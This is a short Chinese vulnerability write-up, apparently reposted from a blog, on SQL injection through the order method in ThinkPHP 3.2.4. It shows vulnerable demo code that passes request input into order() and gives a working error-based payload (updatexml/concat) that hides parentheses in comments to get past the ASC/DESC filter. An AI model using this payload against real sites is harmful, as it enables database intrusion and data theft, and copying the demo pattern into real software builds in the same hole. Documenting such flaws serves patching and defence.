zoukankan      html  css  js  c++  java
  • ThinkPHP3.2.4 order方法注入

    漏洞详情:

    漏洞文件:./ThinkPHPLibraryThinkDbDriver.class.php 中的 parseOrder方法:

    这也是继上次order方法注入之后的修复手段。

    可以看到首先判断是否存在ASC或DESC,正是因为这判断,导致了我们可以引入 ( 等禁止的字符,所以导致了绕过过滤进行注入。

    漏洞证明:

    漏洞demo代码:

    1
    2
    3
    4
    5
    6
       public function orderby()
        {
            $obj = M('user');
            $res $obj->where('id=1')->order(I('id'))->select();
            echo $obj->getLastSql();
        }

    利用证明:

    Payload:id=updatexml/*,*/(/*%20ASC,*/1,concat/*,*/(/*%20ASC,*/0x7e,user/*,*/(/*%20ASC,*/),0x7e),1)

    就是将语句中的所有 (  替换成 /*,*/(/*%20ASC,*/ 即可绕过过滤进行注入。

  • 相关阅读:
    bzoj 2527: [Poi2011]Meteors 整体二分
    bzoj 2738 矩阵乘法
    bzoj 3110 K大数查询
    bzoj 3262 陌上花开
    cogs 577 蝗灾 CDQ分治
    bzoj 1101 zap
    bzoj 2005
    bzoj 3518 Dirichlet卷积
    bzoj 1257
    最优贸易 [NOIP 2009]
  • 原文地址:https://www.cnblogs.com/0daybug/p/14096010.html
Copyright © 2011-2022 走看看